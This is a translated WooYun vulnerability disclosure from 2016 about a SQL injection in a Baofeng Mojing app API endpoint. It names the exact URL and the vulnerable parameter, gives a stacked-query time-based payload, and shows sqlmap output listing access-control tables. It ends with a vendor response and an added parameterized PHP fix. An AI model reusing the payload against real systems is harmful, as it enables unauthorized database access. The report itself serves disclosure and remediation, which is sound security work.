Vulnerability Summary (Followers: 24)
Defect ID: wooyun-2016-0211580
Title: SQL injection on a Baofeng Mojing site / 59 tables / access-control database
Vendor: mojing.cn
Author: hear7v
Submitted: 2016-05-22 08:45
Fixed: 2016-07-07 12:00
Published: 2016-07-07 12:00
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2016-05-22: Details sent to the vendor, awaiting vendor response
2016-05-23: Vendor has confirmed; details disclosed to the vendor only
2016-06-02: Details disclosed to core white hats and experts in the relevant field
2016-06-12: Details disclosed to regular white hats
2016-06-22: Details disclosed to intern white hats
2016-07-07: Details disclosed to the public
Summary:
I had been planning a run of women's-themed reports these days, but this hole turned up tonight instead.
Details:
http://mj.cms.mojing.cn/api/v1/scene/video/testing.php?mobile_brand=Xiaomi&mobile_model=MI%204LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7%20Processor%20rev%201%20(v7l)&cpu_hardware_model=Qualcomm%20MSM8974PRO-AC
This appears to be an API endpoint of the app; the traffic was captured by sniffing the app. Running sqlmap with the app's User-Agent gave a stacked-query injection. Some information:
---
Parameter: cpu_hardware_model (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: mobile_brand=Xiaomi&mobile_model=MI 4LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7 Processor rev 1 (v7l)&cpu_hardware_model=Qualcomm MSM8974PRO-AC');(SELECT * FROM (SELECT(SLEEP(5)))szhG)#
---
Proof of vulnerability:
23:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[01:26:47] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[01:26:47] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[01:26:55] [INFO] adjusting time delay to 2 seconds due to good response times
[01:26:57] [ERROR] invalid character detected. retrying..
[01:26:57] [WARNING] increasing time delay to 3 seconds
59
[01:27:22] [ERROR] invalid character detected. retrying..
[01:27:23] [WARNING] increasing time delay to 4 seconds
[01:27:23] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
acl_menu_url
[01:31:14] [INFO] retrieved: acl_permissions
[01:34:51] [INFO] retrieved: acl_resources
[01:37:40] [INFO] retrieved: acl_roles
[01:39:17] [INFO] retrieved: acl_user_to_role
[01:43:24] [INFO] retrieved: acl_users
[01:44:16] [INFO] retrieved: android_ba
Fix recommendation:
Filter the input. The vendor is so cold; can I get a gift?
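The recommendation above stops at "filter". As an added example (not the vendor's code; the table name, DSN and credentials are placeholders), this is how a PHP endpoint taking the same GET parameters as the reported request would store them safely: every value is bound to a server-side prepared statement, and multi-statement execution is disabled, which also closes the stacked-query path that sqlmap found:

```php
<?php
// Added example, not the vendor's code. The reported endpoint reads device
// fields from $_GET and (per sqlmap) concatenates cpu_hardware_model into SQL.
// Here every value is bound to a server-side prepared statement and
// multi-statement execution is off, so the stacked-query path is closed too.
const DEVICE_FIELDS = [
    'mobile_brand', 'mobile_model', 'image_result', 'sound_result',
    'telecom_operator', 'cpu_instruction_model', 'cpu_hardware_model',
];
const INT_FIELDS = ['image_result', 'sound_result', 'telecom_operator'];

function readDeviceFields(array $query): array
{
    $row = [];
    foreach (DEVICE_FIELDS as $name) {
        $value = $query[$name] ?? '';
        if (!is_string($value) || mb_strlen($value) > 128) {
            throw new InvalidArgumentException("bad value for $name");
        }
        // Flags must be integers; free-text device strings are kept verbatim
        // and only ever reach MySQL as bound parameters, never as SQL text.
        if (in_array($name, INT_FIELDS, true)) {
            if (filter_var($value, FILTER_VALIDATE_INT) === false) {
                throw new InvalidArgumentException("$name must be an integer");
            }
            $value = (int) $value;
        }
        $row[$name] = $value;
    }
    return $row;
}

function insertTestResult(PDO $db, array $row): void
{
    // Column names come from the fixed DEVICE_FIELDS list, never from input.
    $cols  = implode(', ', array_keys($row));
    $marks = implode(', ', array_map(fn ($c) => ":$c", array_keys($row)));
    $stmt  = $db->prepare("INSERT INTO video_test_results ($cols) VALUES ($marks)"); // placeholder table
    foreach ($row as $name => $value) {
        $stmt->bindValue(":$name", $value, is_int($value) ? PDO::PARAM_INT : PDO::PARAM_STR);
    }
    $stmt->execute();
}
// Usage: placeholder DSN and credentials; $_GET as in the report's request.
$db = new PDO('mysql:host=localhost;dbname=placeholder_db', 'user', 'pass', [
    PDO::ATTR_ERRMODE                => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES       => false, // real server-side prepare
    PDO::MYSQL_ATTR_MULTI_STATEMENTS => false, // refuses "...;(SELECT ...)" chains
]);
insertTestResult($db, readDeviceFields($_GET));
```

With the request from the report, the string in cpu_hardware_model is stored literally; the server never parses it as part of the statement.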
Copyright notice: please credit hear7v@WooYun when reposting.
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-05-23 11:54
Vendor reply:
Thank you for submitting the vulnerability; we will fix it as soon as possible.
Latest status:
None